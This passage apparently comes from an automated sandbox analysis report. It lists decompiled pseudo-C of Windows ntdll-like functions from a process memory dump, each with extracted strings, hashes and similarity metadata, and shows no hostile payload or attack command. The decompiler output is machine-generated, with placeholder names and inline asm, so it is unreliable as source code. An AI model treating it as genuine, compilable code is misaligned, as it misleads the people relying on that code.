                                            				char _v96;
                                            				char _v352;
                                            				char _v1072;
                                            				intOrPtr _v1140;
                                            				intOrPtr _v1148;
                                            				char _v1152;
                                            				char _v1156;
                                            				char _v1160;
                                            				char _v1164;
                                            				char _v1168;
                                            				char* _v1172;
                                            				short _v1174;
                                            				char _v1176;
                                            				char _v1180;
                                            				char _v1192;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				short _t41;
                                            				short _t42;
                                            				intOrPtr _t80;
                                            				intOrPtr _t81;
                                            				signed int _t82;
                                            				void* _t83;
                                            
                                            				_v12 =  *0x10dd360 ^ _t82;
                                            				_t41 = 0x14;
                                            				_v1176 = _t41;
                                            				_t42 = 0x16;
                                            				_v1174 = _t42;
                                            				_v1164 = 0x100;
                                            				_v1172 = L"BinaryHash";
                                            				_t81 = E01020BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                            				if(_t81 < 0) {
                                            					L11:
                                            					_t75 = _t81;
                                            					E01063706(0, _t81, _t79, _t80);
                                            					L12:
                                            					if(_a4 != 0xc000047f) {
                                            						E0102FA60( &_v1152, 0, 0x50);
                                            						_v1152 = 0x60c201e;
                                            						_v1148 = 1;
                                            						_v1140 = E01063540;
                                            						E0102FA60( &_v1072, 0, 0x2cc);
                                            						_push( &_v1072);
                                            						E0103DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                            						E01070C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                            						_push(_v1152);
                                            						_push(0xffffffff);
                                            						E010297C0();
                                            					}
                                            					return E0102B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                            				}
                                            				_t79 =  &_v352;
                                            				_t81 = E01063971(0, _a4,  &_v352,  &_v1156);
                                            				if(_t81 < 0) {
                                            					goto L11;
                                            				}
                                            				_t75 = _v1156;
                                            				_t79 =  &_v1160;
                                            				_t81 = E01063884(_v1156,  &_v1160,  &_v1168);
                                            				if(_t81 >= 0) {
                                            					_t80 = _v1160;
                                            					E0102FA60( &_v96, 0, 0x50);
                                            					_t83 = _t83 + 0xc;
                                            					_push( &_v1180);
                                            					_push(0x50);
                                            					_push( &_v96);
                                            					_push(2);
                                            					_push( &_v1176);
                                            					_push(_v1156);
                                            					_t81 = E01029650();
                                            					if(_t81 >= 0) {
                                            						if(_v92 != 3 || _v88 == 0) {
                                            							_t81 = 0xc000090b;
                                            						}
                                            						if(_t81 >= 0) {
                                            							_t75 = _a4;
                                            							_t79 =  &_v352;
                                            							E01063787(_a4,  &_v352, _t80);
                                            						}
                                            					}
                                            					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                            				}
                                            				_push(_v1156);
                                            				E010295D0();
                                            				if(_t81 >= 0) {
                                            					goto L12;
                                            				} else {
                                            					goto L11;
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                                            • Instruction ID: 89d7be19221ae4357cf1ace0147799c841b77539bd02bb48f30a7a9ee2c44224
                                            • Opcode Fuzzy Hash: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                                            • Instruction Fuzzy Hash: CD4142F1D0052DABDB21DA50CC85FEEB77CAB54714F0085A5EA49AB241DB319E888FE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E010B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				char _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				void* __ebx;
                                            				void* _t35;
                                            				signed int _t42;
                                            				char* _t48;
                                            				signed int _t59;
                                            				signed char _t61;
                                            				signed int* _t79;
                                            				void* _t88;
                                            
                                            				_v28 = __edx;
                                            				_t79 = __ecx;
                                            				if(E010B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                            					L13:
                                            					_t35 = 0;
                                            					L14:
                                            					return _t35;
                                            				}
                                            				_t61 = __ecx[1];
                                            				_t59 = __ecx[0xf];
                                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                            				_v36 = _a8 << 0xc;
                                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                            				asm("sbb esi, esi");
                                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                            				if(_t42 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t59);
                                            					_push(0xffffffff);
                                            					if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                            						_push(_t61);
                                            						E010AA80D(_t59, 1, _v20, 0);
                                            						_t88 = 4;
                                            					}
                                            				}
                                            				_t35 = E010AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                            				if(_t35 < 0) {
                                            					goto L14;
                                            				}
                                            				E010B1293(_t79, _v40, E010B07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                            				if(E01007D50() == 0) {
                                            					_t48 = 0x7ffe0380;
                                            				} else {
                                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            					E010A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                            				}
                                            				goto L13;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction ID: 8f8828e649ad0adde63528c3903b2256daef612217638f83c7c50d1dcaf3490c
                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction Fuzzy Hash: C431E232700306ABE710DE28CC85FDB7BE9AB88754F144229FA949B284D770E904C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E01063884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr* _v16;
                                            				char* _v20;
                                            				short _v22;
                                            				char _v24;
                                            				intOrPtr _t38;
                                            				short _t40;
                                            				short _t41;
                                            				void* _t44;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            
                                            				_v16 = __edx;
                                            				_t40 = 0x14;
                                            				_v24 = _t40;
                                            				_t41 = 0x16;
                                            				_v22 = _t41;
                                            				_t38 = 0;
                                            				_v12 = __ecx;
                                            				_push( &_v8);
                                            				_push(0);
                                            				_push(0);
                                            				_push(2);
                                            				_t43 =  &_v24;
                                            				_v20 = L"BinaryName";
                                            				_push( &_v24);
                                            				_push(__ecx);
                                            				_t47 = 0;
                                            				_t48 = E01029650();
                                            				if(_t48 >= 0) {
                                            					_t48 = 0xc000090b;
                                            				}
                                            				if(_t48 != 0xc0000023) {
                                            					_t44 = 0;
                                            					L13:
                                            					if(_t48 < 0) {
                                            						L16:
                                            						if(_t47 != 0) {
                                            							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                            						}
                                            						L18:
                                            						return _t48;
                                            					}
                                            					 *_v16 = _t38;
                                            					 *_a4 = _t47;
                                            					goto L18;
                                            				}
                                            				_t47 = L01004620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                            				if(_t47 != 0) {
                                            					_push( &_v8);
                                            					_push(_v8);
                                            					_push(_t47);
                                            					_push(2);
                                            					_push( &_v24);
                                            					_push(_v12);
                                            					_t48 = E01029650();
                                            					if(_t48 < 0) {
                                            						_t44 = 0;
                                            						goto L16;
                                            					}
                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                            						_t48 = 0xc000090b;
                                            					}
                                            					_t44 = 0;
                                            					if(_t48 < 0) {
                                            						goto L16;
                                            					} else {
                                            						_t17 = _t47 + 0xc; // 0xc
                                            						_t38 = _t17;
                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                            							_t48 = 0xc000090b;
                                            						}
                                            						goto L13;
                                            					}
                                            				}
                                            				_t48 = _t48 + 0xfffffff4;
                                            				goto L18;
                                            			}
















                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                                            • Instruction ID: abc62330088f1cb655fa51e9ca1aee9a0d5264c94ab0b686c16cdd741b950524
                                            • Opcode Fuzzy Hash: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                                            • Instruction Fuzzy Hash: BF31E832D0051AAFEB16DA58C945EAFB7B8FB44720F014169E998AB251D7319E00CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 33%
                                            			E0101D294(void* __ecx, char __edx, void* __eflags) {
                                            				signed int _v8;
                                            				char _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				intOrPtr _v64;
                                            				char* _v68;
                                            				intOrPtr _v72;
                                            				char _v76;
                                            				signed int _v84;
                                            				intOrPtr _v88;
                                            				char _v92;
                                            				intOrPtr _v96;
                                            				intOrPtr _v100;
                                            				char _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t35;
                                            				char _t38;
                                            				signed int _t40;
                                            				signed int _t44;
                                            				signed int _t52;
                                            				void* _t53;
                                            				void* _t55;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t64;
                                            				signed int _t65;
                                            				signed int _t66;
                                            
                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x10dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                            				_v105 = __edx;
                                            				_push( &_v92);
                                            				_t52 = 0;
                                            				_push(0);
                                            				_push(0);
                                            				_push( &_v104);
                                            				_push(0);
                                            				_t59 = __ecx;
                                            				_t55 = 2;
                                            				if(E01004120(_t55, __ecx) < 0) {
                                            					_t35 = 0;
                                            					L8:
                                            					_pop(_t61);
                                            					_pop(_t64);
                                            					_pop(_t53);
                                            					return E0102B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                            				}
                                            				_v96 = _v100;
                                            				_t38 = _v92;
                                            				if(_t38 != 0) {
                                            					_v104 = _t38;
                                            					_v100 = _v88;
                                            					_t40 = _v84;
                                            				} else {
                                            					_t40 = 0;
                                            				}
                                            				_v72 = _t40;
                                            				_v68 =  &_v104;
                                            				_push( &_v52);
                                            				_v76 = 0x18;
                                            				_push( &_v76);
                                            				_v64 = 0x40;
                                            				_v60 = _t52;
                                            				_v56 = _t52;
                                            				_t44 = E010298D0();
                                            				_t62 = _v88;
                                            				_t65 = _t44;
                                            				if(_t62 != 0) {
                                            					asm("lock xadd [edi], eax");
                                            					if((_t44 | 0xffffffff) != 0) {
                                            						goto L4;
                                            					}
                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                            					E010295D0();
                                            					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                            					goto L4;
                                            				} else {
                                            					L4:
                                            					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                            					if(_t65 >= 0) {
                                            						_t52 = 1;
                                            					} else {
                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                            						}
                                            					}
                                            					_t35 = _t52;
                                            					goto L8;
                                            				}
                                            			}


































                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                                            • Instruction ID: ca14e4fdd16c7439f7763d37c1c05a328750590d319476f86225a275e18cb6be
                                            • Opcode Fuzzy Hash: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                                            • Instruction Fuzzy Hash: 15318DB1508305AFD361DF68C9849AFBBE8EB99654F004A2EF9D483250D739DD04CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E00FF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                            				intOrPtr _v8;
                                            				char _v16;
                                            				intOrPtr* _t26;
                                            				intOrPtr _t29;
                                            				void* _t30;
                                            				signed int _t31;
                                            
                                            				_t27 = __ecx;
                                            				_t29 = __edx;
                                            				_t31 = 0;
                                            				_v8 = __edx;
                                            				if(__edx == 0) {
                                            					L18:
                                            					_t30 = 0xc000000d;
                                            					goto L12;
                                            				} else {
                                            					_t26 = _a4;
                                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                            						goto L18;
                                            					} else {
                                            						E0102BB40(__ecx,  &_v16, __ecx);
                                            						_push(_t26);
                                            						_push(0);
                                            						_push(0);
                                            						_push(_t29);
                                            						_push( &_v16);
                                            						_t30 = E0102A9B0();
                                            						if(_t30 >= 0) {
                                            							_t19 =  *_t26;
                                            							if( *_t26 != 0) {
                                            								goto L7;
                                            							} else {
                                            								 *_a8 =  *_a8 & 0;
                                            							}
                                            						} else {
                                            							if(_t30 != 0xc0000023) {
                                            								L9:
                                            								_push(_t26);
                                            								_push( *_t26);
                                            								_push(_t31);
                                            								_push(_v8);
                                            								_push( &_v16);
                                            								_t30 = E0102A9B0();
                                            								if(_t30 < 0) {
                                            									L12:
                                            									if(_t31 != 0) {
                                            										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                            									}
                                            								} else {
                                            									 *_a8 = _t31;
                                            								}
                                            							} else {
                                            								_t19 =  *_t26;
                                            								if( *_t26 == 0) {
                                            									_t31 = 0;
                                            								} else {
                                            									L7:
                                            									_t31 = L01004620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                            								}
                                            								if(_t31 == 0) {
                                            									_t30 = 0xc0000017;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t30;
                                            			}










                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: WindowsExcludedProcs
                                            • API String ID: 0-3583428290
                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction ID: c783135cc6a4f70489bb8d137e949dc63ce2adf953483c82da9aca5cb66aaaaf
                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction Fuzzy Hash: 7F21F877A4112DEBDB229A598880FEB77ADFF51B60F154465FA84DB210D731DC00E7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                            				intOrPtr _t13;
                                            				intOrPtr _t14;
                                            				signed int _t16;
                                            				signed char _t17;
                                            				intOrPtr _t19;
                                            				intOrPtr _t21;
                                            				intOrPtr _t23;
                                            				intOrPtr* _t25;
                                            
                                            				_t25 = _a8;
                                            				_t17 = __ecx;
                                            				if(_t25 == 0) {
                                            					_t19 = 0xc00000f2;
                                            					L8:
                                            					return _t19;
                                            				}
                                            				if((__ecx & 0xfffffffe) != 0) {
                                            					_t19 = 0xc00000ef;
                                            					goto L8;
                                            				}
                                            				_t19 = 0;
                                            				 *_t25 = 0;
                                            				_t21 = 0;
                                            				_t23 = "Actx ";
                                            				if(__edx != 0) {
                                            					if(__edx == 0xfffffffc) {
                                            						L21:
                                            						_t21 = 0x200;
                                            						L5:
                                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                            						 *_t25 = _t13;
                                            						L6:
                                            						if(_t13 == 0) {
                                            							if((_t17 & 0x00000001) != 0) {
                                            								 *_t25 = _t23;
                                            							}
                                            						}
                                            						L7:
                                            						goto L8;
                                            					}
                                            					if(__edx == 0xfffffffd) {
                                            						 *_t25 = _t23;
                                            						_t13 = _t23;
                                            						goto L6;
                                            					}
                                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                            					 *_t25 = _t13;
                                            					L14:
                                            					if(_t21 == 0) {
                                            						goto L6;
                                            					}
                                            					goto L5;
                                            				}
                                            				_t14 = _a4;
                                            				if(_t14 != 0) {
                                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                            					if(_t16 <= 1) {
                                            						_t21 = 0x1f8;
                                            						_t13 = 0;
                                            						goto L14;
                                            					}
                                            					if(_t16 == 2) {
                                            						goto L21;
                                            					}
                                            					if(_t16 != 4) {
                                            						_t19 = 0xc00000f0;
                                            						goto L7;
                                            					}
                                            					_t13 = 0;
                                            					goto L6;
                                            				} else {
                                            					_t21 = 0x1f8;
                                            					goto L5;
                                            				}
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                                            • Instruction ID: 3c3391eab8ead43a6fa658cd2b53713e99f00440e09b966be73b18e317ebbfd1
                                            • Opcode Fuzzy Hash: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                                            • Instruction Fuzzy Hash: 0811BE35304A038BFBB78E1C849073A76D5BB85664F24456AE9E9CB3D1EBB0C841A343
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E01098DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t35;
                                            				void* _t41;
                                            
                                            				_t40 = __esi;
                                            				_t39 = __edi;
                                            				_t38 = __edx;
                                            				_t35 = __ecx;
                                            				_t34 = __ebx;
                                            				_push(0x74);
                                            				_push(0x10c0d50);
                                            				E0103D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                            					E01075720(0x65, 0, "Critical error detected %lx\n", _t35);
                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                            						asm("int3");
                                            						 *(_t41 - 4) = 0xfffffffe;
                                            					}
                                            				}
                                            				 *(_t41 - 4) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                            				 *((intOrPtr*)(_t41 - 0x64)) = L0103DEF0;
                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                            				_push(_t41 - 0x70);
                                            				L0103DEF0(1, _t38);
                                            				 *(_t41 - 4) = 0xfffffffe;
                                            				return E0103D130(_t34, _t39, _t40);
                                            			}






                                            Strings
                                            • Critical error detected %lx, xrefs: 01098E21
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Critical error detected %lx
                                            • API String ID: 0-802127002
                                            • Opcode ID: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                                            • Instruction ID: 64696c56d821fdeb713962ba62a81f2dca78ba59eaf1ba9eb00c9498db4c34ac
                                            • Opcode Fuzzy Hash: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                                            • Instruction Fuzzy Hash: 8F1175B5D00348EADF24DFA889157DCBBB4BB05311F20825EE1A9AB392C3340602DF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0107FF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                            • API String ID: 0-1911121157
                                            • Opcode ID: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                                            • Instruction ID: 22e82df3c7b1381ea6e4eb39bbf7a8bc22f609627ef3b63b6ed7ea72e4f0cb2c
                                            • Opcode Fuzzy Hash: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                                            • Instruction Fuzzy Hash: C4110475910545EFDB22EB54CC48FD8BBF2FF04714F548084F5885B2A1CB399940DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                            • Instruction ID: b627d7ea567cced877c2c18f6bf1485ad3623b99bdcbd8c9b6859da6a123e813
                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                            • Instruction Fuzzy Hash: CA311632300642AFE322D7A8C844FAEBBEAEF85750F984499E6C58B742DA74DC41C750
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                            • Instruction ID: a0310ad1a035681b9afe35c9dcb74192b2c28bf531112a71be93ea221d53b664
                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                            • Instruction Fuzzy Hash: 0131B2326047069BC719DF68CC94A6BB7EAFFC0310F44492DF59687681DA34E809C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04bb591858dfd4e907ef08768264a291e89c21b0e4e6658698d0c25cc8e95771
                                            • Instruction ID: 256817df2442ec42153a83f1a5856e329145d9d0a0349cb49c3b317f9dd351ac
                                            • Opcode Fuzzy Hash: 04bb591858dfd4e907ef08768264a291e89c21b0e4e6658698d0c25cc8e95771
                                            • Instruction Fuzzy Hash: DA419CB1D00219AFDB20CFAAC940BFEBBF8FF48714F04816AE994A7250DB359905CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0a7c546c119014700a7e3d3b65d1cb53c36fb154d592254731042bb5d353ba7
                                            • Instruction ID: 77bb86fa87f3b929a0511dd2b96a96fd917581b0fb3406e5c5929008f9550dae
                                            • Opcode Fuzzy Hash: c0a7c546c119014700a7e3d3b65d1cb53c36fb154d592254731042bb5d353ba7
                                            • Instruction Fuzzy Hash: ED314632241A11EBC722AF29CC81BAA77A5FF10B64F104629FAD95B1A5DB30F800D790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bdf0ee0ebb50538b706792da0ee73ad45d8b7dfc559ff53f1631ae53e7214b2
                                            • Instruction ID: 7a097eff17057702bafa377429d25248661c92e08dd662453c111c52df0c73b7
                                            • Opcode Fuzzy Hash: 7bdf0ee0ebb50538b706792da0ee73ad45d8b7dfc559ff53f1631ae53e7214b2
                                            • Instruction Fuzzy Hash: BC31AF31A04625DBDB659F2DD841A7BBBF5FF49700B0580AAE9C6CF391E638D840C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30e6c4b739601c1dce04b21dc84208c656601159dc4a80e59f06d3a9d77aa523
                                            • Instruction ID: fe8ea8d1d4674ae0cd2b9a227da359f98484023bb3d39ed91b9b6810f767214e
                                            • Opcode Fuzzy Hash: 30e6c4b739601c1dce04b21dc84208c656601159dc4a80e59f06d3a9d77aa523
                                            • Instruction Fuzzy Hash: FA418CB5A01345DFDB15CF58C990B9DBBF1BB89314F1880A9ED84AB348C779A901CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction ID: c26e20538dcbde8ff22756922e8953888e959a948f1cca51f0d4abf5a6cd7d80
                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction Fuzzy Hash: AB31487160194BBFF746EBB4C980BF9FB94BF52200F0442AAD59C47391DB386A09D7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9109a9185182ad67120fc196d1e1d5d27ea3affbf188efa19051862d873a4312
                                            • Instruction ID: b58cef6bbd76acff8785b5b0540616ec446b48c9d5642c1751bd273b59171d65
                                            • Opcode Fuzzy Hash: 9109a9185182ad67120fc196d1e1d5d27ea3affbf188efa19051862d873a4312
                                            • Instruction Fuzzy Hash: F531C272604751DBD321DF2CC940AAAB7E9BF88704F044A69F9D58B691E730E904C7A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a321539342f7f2a27eee5ac3297e5c5f5d27f94016acd3fcbc66b1755aa4cd38
                                            • Instruction ID: e9c95234581e078158bc91d4680e8fe5eba2d05bace3f9c7ffd387910f4b69dd
                                            • Opcode Fuzzy Hash: a321539342f7f2a27eee5ac3297e5c5f5d27f94016acd3fcbc66b1755aa4cd38
                                            • Instruction Fuzzy Hash: A231787150A302DFCB14DF68D89145ABBE1FF85700F0589AEE8C88F291D730E904CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 74a389a92d18add4b91cd1746e1be937e5778f48a264f81c28192e3d4483d4a4
                                            • Instruction ID: bad714e623974b98ef79ce6ce50b9ee49dcdc84baa2e51e5f2b13f94578f233a
                                            • Opcode Fuzzy Hash: 74a389a92d18add4b91cd1746e1be937e5778f48a264f81c28192e3d4483d4a4
